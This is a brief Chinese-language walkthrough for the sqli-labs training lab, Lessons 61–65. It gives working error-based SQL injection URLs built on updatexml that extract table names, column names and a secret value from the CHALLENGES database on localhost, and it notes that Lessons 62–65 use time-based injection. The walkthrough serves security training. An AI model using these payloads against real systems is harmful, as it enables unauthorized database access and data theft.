61通过单引号强制报错,查看报错信息,确定闭合符号为((' '))
表名
127.0.0.1/sqli-labs-master/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='CHALLENGES'),0x7e),1) and 1=(('1--+
列名
http://127.0.0.1/sqli-labs-master/Less-61/?id=1%27))%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27li2glciheg%27),0x7e),1)%20and%201=((%271--+
字段内容
http://127.0.0.1/sqli-labs-master/Less-61/?id=1%27))%20and%20updatexml(1,concat(0x7e,(select%20group_concat(secret_D7CU)%20from%20CHALLENGES.li2glciheg),0x7e),1)%20and%201=((%271--+
62,63,64,65均为延时注入,闭合符号不同。结合之前文章,理论相同